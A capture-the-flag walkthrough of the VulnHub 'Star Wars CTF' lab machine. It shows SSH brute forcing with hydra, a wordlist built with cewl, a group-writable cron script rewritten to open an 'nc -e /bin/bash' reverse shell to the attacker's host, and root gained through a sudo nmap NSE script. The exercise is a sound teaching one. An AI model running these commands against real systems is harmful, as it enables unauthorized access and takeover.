[VULNHUB] Star Wars CTF

Today we are going to hack the Vulnhub machine called Star Wars CTF. You can download it from the following link: https://www.vulnhub.com/entry/star-wars-ctf-1,528/
  • Enumeration
  • We start with an nmap scan to see which ports are open.
    ~ > nmap -A -p- 192.168.1.35
    Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 12:37 CEST
    Nmap scan report for 192.168.1.35
    Host is up (0.00067s latency).
    Not shown: 65533 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey:
    |   2048 4c:53:4d:b2:26:ee:a5:10:d4:be:99:84:2a:9a:aa:11 (RSA)
    |   256 95:d7:a4:e0:74:63:4b:08:b0:a8:8c:dc:e1:f8:91:25 (ECDSA)
    |_  256 1d:07:d1:3d:99:02:f0:04:ba:23:c3:a4:fd:0d:3d:91 (ED25519)
    80/tcp open  http    Apache httpd 2.4.38 ((Debian))
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: Site doesn't have a title (text/html).
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 12.90 seconds
    At http://192.168.1.35/robots.txt we find:
    Why does the Jedi Order keep checking the robots.txt file. Might take a look at /r2d2 He is the real OG.
    We visit http://192.168.1.35/r2d2 and see that it contains a lot of text... Meanwhile, we download the two images shown on the main page at http://192.168.1.35.
    ~ > wget http://192.168.1.35/yoda.jpg
    ~ > wget http://192.168.1.35/yoda.png
    They may contain some stego, so we search for "stego online"... We find the following site[1], and when we feed it yoda.png it tells us that the real password is babyYoda123, but we don't have any login yet... We google for a Star Wars wordlist and find this one[2]. We download it and use it as a list of usernames together with the password we found above. Let's launch hydra!
    ~ > hydra -L starwars.txt -p babyYoda123 192.168.1.35 ssh -f
    Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-10 19:25:07
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
    [DATA] max 16 tasks per 1 server, overall 16 tasks, 217 login tries (l:217/p:1), ~14 tries per task
    [DATA] attacking ssh://192.168.1.35:22/
    [22][ssh] host: 192.168.1.35   login: han   password: babyYoda123
    [STATUS] attack finished for 192.168.1.35 (valid pair found)
    1 of 1 target successfully completed, 1 valid password found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-10 19:25:20
    We get the password for the user "han". Let's log in!
  • Low Shell
    ~ > ssh han@192.168.1.35
    han@192.168.1.35's password:
    Linux starwars 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Thu Jul 23 08:18:42 2020 from ::1
    han@starwars:~$ id
    uid=1000(han) gid=1000(han) groups=1000(han)
    We explore the system a bit...
    han@starwars:~$ ls -la
    total 32
    drwxr-xr-x 4 han  han  4096 Jul 23 08:11 .
    drwxr-xr-x 5 root root 4096 Jul 23 08:18 ..
    -rw------- 1 han  han   483 Jul 24 20:42 .bash_history
    -rw-r--r-- 1 han  han   220 Apr 18  2019 .bash_logout
    -rw-r--r-- 1 han  han  3526 Apr 18  2019 .bashrc
    drwx------ 3 han  han  4096 Jul 23 08:02 .gnupg
    -rw-r--r-- 1 han  han   807 Apr 18  2019 .profile
    drwxr-xr-x 2 han  han  4096 Jul 24 20:27 .secrets
    han@starwars:~$ cd .secrets
    han@starwars:~/.secrets$ ls -la
    total 12
    drwxr-xr-x 2 han han 4096 Jul 24 20:27 .
    drwxr-xr-x 4 han han 4096 Jul 23 08:11 ..
    -rw-r----- 1 han han   22 Jul 24 20:28 note.txt
    han@starwars:~/.secrets$ cat note.txt
    Anakin is a cewl kid.
    han@starwars:~/.secrets$
    We see a note.txt in the .secrets directory. It uses two interesting words: "Anakin" and "cewl". On one hand, we can see that the user skywalker belongs to the "anakin" group.
    han@starwars:~/.secrets$ cat /etc/group
    anakin:x:2000:Darth,skywalker
    On the other hand, we use the "cewl" tool, which builds wordlists from a website, on the text-heavy page we saw earlier.
    cewl http://192.168.1.35/r2d2 > dic2.txt
    Once we have everything, we use hydra to see if we can get skywalker's password with the dictionary we built.
    ~ > hydra -l skywalker -P dic2.txt 192.168.1.35 ssh
    Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-10 19:31:18
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [DATA] max 16 tasks per 1 server, overall 16 tasks, 328 login tries (l:1/p:328), ~21 tries per task
    [DATA] attacking ssh://192.168.1.35:22/
    [22][ssh] host: 192.168.1.35   login: skywalker   password: tatooine
    Got it :) We log in as skywalker.
    ~ > ssh skywalker@192.168.1.35
    skywalker@192.168.1.35's password:
    Linux starwars 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Fri Jul 24 20:09:34 2020 from 192.168.0.118
    skywalker@starwars:~$ id
    uid=1001(skywalker) gid=1001(skywalker) groups=1001(skywalker),2000(anakin)
    We explore the system a bit.
    skywalker@starwars:~$ cd .secrets/
    skywalker@starwars:~/.secrets$ ls
    note.txt
    skywalker@starwars:~/.secrets$ cat note.txt
    Darth must take up the job of being a good father
    This time the "interesting" word in the note is job. We keep exploring...
    skywalker@starwars:~/.secrets$ cd /home
    skywalker@starwars:/home$ ls
    Darth  han  skywalker
    skywalker@starwars:/home$ cd Darth
    skywalker@starwars:/home/Darth$ ls -la
    total 44
    drwxr-xr-x 5 Darth Darth 4096 Jul 24 21:03 .
    drwxr-xr-x 5 root  root  4096 Jul 23 08:18 ..
    -rw------- 1 Darth Darth 2351 Jul 24 22:33 .bash_history
    -rw-r--r-- 1 Darth Darth  220 Apr 18  2019 .bash_logout
    -rw-r--r-- 1 Darth Darth 3526 Apr 18  2019 .bashrc
    drwx------ 3 Darth Darth 4096 Jul 23 08:20 .gnupg
    -rw------- 1 Darth Darth   42 Jul 24 21:03 .lesshst
    drwxr-xr-x 3 Darth Darth 4096 Jul 24 19:43 .local
    -rw-r--r-- 1 Darth Darth  807 Apr 18  2019 .profile
    drwxr-xr-x 2 Darth Darth 4096 Jul 24 20:13 .secrets
    -rw-r--r-- 1 Darth Darth   66 Jul 24 19:43 .selected_editor
    skywalker@starwars:/home/Darth$ cd .secrets
    skywalker@starwars:/home/Darth/.secrets$ ls -la
    total 12
    drwxr-xr-x 2 Darth Darth  4096 Jul 24 20:13 .
    drwxr-xr-x 5 Darth Darth  4096 Jul 24 21:03 ..
    -rwxrw-r-- 1 Darth anakin  105 Jul 24 20:10 evil.py
    Inside Darth's home, in the .secrets folder, there is a Python script called evil.py. We have write permission on it (it is group-writable and we belong to the anakin group), and given the hint in the previous note, it is most likely a script that runs every so often. The script contains:
    skywalker@starwars:/home/Darth/.secrets$ cat evil.py
    # Let the fear flow through you every single minute
    fear = 1
    anger = fear
    hate = anger
    suffering = hate
    We modify it so that it gives us a reverse shell.
    skywalker@starwars:/home/Darth/.secrets$ cat evil.py
    import os
    os.system("nc -e /bin/bash 192.168.1.59 5555")
    We set nc listening...
    ~ > nc -nlvp 5555
    listening on [any] 5555 ...
    And after a moment.
    ~ > nc -nlvp 5555
    listening on [any] 5555 ...
    connect to [192.168.1.59] from (UNKNOWN) [192.168.1.35] 34298
    python -c 'import pty;pty.spawn("/bin/bash")'
    Darth@starwars:~$
  • Privilege Escalation
  • Now we are Darth! Let's see whether we can do anything with sudo.
    Darth@starwars:~$ sudo -l
    sudo -l
    Matching Defaults entries for Darth on starwars:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

    User Darth may run the following commands on starwars:
        (ALL) NOPASSWD: /usr/bin/nmap
    Darth@starwars:~$
    We can run nmap as root. In this case, nmap does not accept the --interactive parameter that we could otherwise use to escalate privileges. What we will do instead is create an ".nse" script, pass it to nmap, and have it give us a shell. We create the script (in Lua).
    Darth@starwars:/tmp$ echo "os.execute(\"/bin/sh\")" > b.nse
    We run it...
    Darth@starwars:~$ sudo nmap --script=/tmp/b.nse
    sudo nmap --script=/tmp/b.nse

    Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 09:20 EDT
    # id
    uid=0(root) gid=0(root) groups=0(root)
  • root.txt
    # cd /root
    # cat flag.txt
    [ASCII art banner]
    I hope you liked it Padawan :)
    #
  • End
  • And with that we are root on the machine.
    [1] https://stylesuxx.github.io/steganography/
    [2] https://gist.github.com/bgilham/f1796d6eab8f283f64f4